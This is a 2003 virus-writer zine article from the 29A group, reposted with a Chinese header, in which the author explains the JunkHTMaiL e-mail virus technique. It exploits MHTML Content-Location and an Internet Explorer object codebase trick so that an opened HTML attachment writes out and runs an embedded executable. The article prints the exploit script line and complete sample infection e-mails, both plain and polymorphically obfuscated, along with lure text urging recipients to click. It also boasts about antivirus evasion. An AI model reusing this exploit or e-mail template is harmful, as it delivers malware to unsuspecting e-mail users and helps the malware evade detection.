29a-7.008

从29A上收集的病毒源码

                             Self-Executing HTML
                               roy g biv / 29A



About the author:

Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (Junkmail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
and world's first 32/64-bit parasitic EPO .NET virus (Croissant).   Author  of
various  retrovirus  articles (eg see Vlad #7 for the strings that  make  your
code  invisible to TBScan).  Went to sleep for a number of years.  This is  my
seventh  virus for Win32.  It is the world's first virus using  self-executing
HTML.


MHTML - Microsoft Helps To Make expLoits ;)

JunkHTMaiL  brings  to you another new technique for e-mail speading.  If  you
read  RFC  2557,  you will see a description about MIME HTML  (MHTML).   Using
MHTML  allows us to send MIME files that we can execute!  How?  The first part
is to specify the name and location of the file to create.  MHTML allows us to
do  that using the "Content-Location:" token.  Using the "file://" URI, we can
specify the path and filename, for example like this:

Content-Location://file:///.exe

Only  the  directory and suffix is needed.  No need for any filename  at  all.
This  is the same as for OLE2 files.  So now we have our file, how to run  it?


Internet Exploiter

Internet Explorer will search a large amount of files for HTML code, so all we
need  to do is append some script and use a codebase that references our file.
We can do it this way:

<object classid='clsid:1baddeed'codebase='mhtml:<document.URL>!file:///.exe'></object>

CLSID  can be any hex string.  Only the first 8 bytes are checked, so no  need
for the other parts.  The problem is the variable part (the document.URL).  We
need to know this before we can instantiate the object.  What's the solution?


DHTML - Devious HTML :)

Dynamic  HTML allows us to alter pages on-the-fly, which will the be  executed
automatically.  We can do this with the document.write() method, like this:

<script>with(document)write("<object classid='clsid:1baddeed'codebase='mhtml:"+URL+"!file:///.exe'></object>")</script>

So now we can resolve our variable URL and create a page with the proper value
which  will  be  executed.   The codebase refers to  our  file,  and  Internet
Explorer will automatically decode and execute for us.

JunkHTMaiL  uses  the  JunkMail polymorphic SMTP engine, so the text  will  be
highly variable.

Here is an example JunkHTMaiL e-mail before obfuscation:

MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary=WIFVHABY

--WIFVHABY

Just click the attachment
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp

--WIFVHABY
Content-Type: text/plain;
 name=email.htm
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment

MIME-Version: 1.0
Content-Location:file:///.exe
Content-Transfer-Encoding: base64

[base64 encoded file]
<script>with(document)write("<object classid=3D'clsid:1baddeed'codebase=3D'=
mhtml:"+URL+"!file:///.exe'></object>")</script>
--WIFVHABY
--


Here is an example JunkHTMaiL e-mail after obfuscation:

MIMe-vERSioN: 1(*T).0
COntEnT-TyPe: (<!)mU(3)l(/)TIp(*)aRT(!)/M(;)i(^)X(eCz)E(/`x)d;
 (,#?)Bo(8l)uN(_)Da(*F)Ry=WIFVHABY

XXEMEDWSIUKZTCJYCBTCRRBYFLUICTWOURLFJDDRB
EIQFPJJEAHOGZWSZYFPEXNSOSBDJNHURTQTRRIBLUPYXIPFWBXJNBOQVLSMJ
GJHZF
KKTKYGEHWHUZTXWBGKDFCIJBCMGBZBFEDMVLYDURSRTXNOXGLJYTGVEPW
GFVEVLCJ
WIFVHABY--
--WIFVHABY

Just click the attachment
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp

--WIFVHABY
coNTent-TYPE: T(Gd)E(D`e)X(2)t(o)/(K)pl(9!B)AI(mI8)n;
 na(hD)me=(-M1)EmA(43O)iL.(H)HT(D9)m
coNtEnT-TRANSFEr-ENCoDING: Qu(ZYT)OT(0&y)E(DBZ)d(a)-(_)PRi(p9Q)N(|N)TaBlE
COnteNT-diSPOSItiON: Att(!)Ach(g)M(</)ENt

M=49M=65-=56=45=52=53=49=6F=4E: 1=28=36).0
c=4Fn=54=45n=74-=6C=4F=63=61t=69=6F=6E: FIl=65=3A=2F=2F=2F=2EExE
c=6F=4E=74=65=6Et=2DTRa=4E=73=46Er-=45NC=4Fd=49Ng=3A =62(?Q=29=41(y)=53e(=
=69)=36=34

[base64 encoded file begins]
T=56=70Q=41=41IA=41=41AE=41=41=38=41/=2F8=41ALgA=41A=41A=41AAA=51=41A=61=
=41=41A=41AAAAA=41AAAA=41A=41=41=41A=41AA=41AA=41A=41A=41A=41=41=41=41=41=
=41=41A
...
[base64 encoded file ends]
=3CSC=52IP=54=3E=6D=6Fve=42=79(=39=399=39)=3B=77it=68(docum=65=6E=74=29=77=
r=69te("<=4F=42=4A=45C=54 =43=4CAS=53=49D=3D=27=43LSI=44:1B=41=44D=45=45=
=44'C=4F=44=45B=41=53=45=3D'M=48=54ML=3A"=2BU=52L=2B"!F=49=4CE=3A/=2F=2F=
.=45X=45=27=3E=3C=2FOB=4AEC=54>"=29<=2FS=43=52=49=50=54=3E
--WIFVHABY
OIALNKVLKBDYHURLTQQGRACSXCSGLWKJVSDROSQBJOXYMYAFRFQJGKA
VBJLPEZQDTRVIXV
AHAVZF
ABCAYMKUVCZERXGK
MCKSRAHQVCJVFYZJGTRUHRJQXPNUWJRRJCRTGCOFCRWNRNKYGAXT
NEWUHSRTHFEIWGHMMELC
PQJQLUYEBRTOPMMUEIZYEXAITLRBJOTVLMFZIZTUTSVILGZQQSKODLBCIKW
VADMWVJEXMGWEPAJIVBEXBQQESSCWMQVSUZXVOMLGATIUKIJCCZRZZQSF
FPGMSXAG
--


Wow! :)  Yes, even the base64 encoded part is encoded further using octets.

JunkHTMaiL  uses the JunkMail text compression to hide the e-mail texts.   The
compressor is also included so you can change the texts if you want to.


That's all for this time.
Some cynics might say it is too late for you to ever make it to the top.
They are right.  That top is ours. ;)


roy g biv greets:

RT Fishel               JunkMail rocks!
VirusBuster             I hope it's not too late...
Prototype               see you in the next life
The Gingerbread Man     ...actus rium non facit nici.  mens ria sit


rgb/29A may 2003
iam_rgb@hotmail.com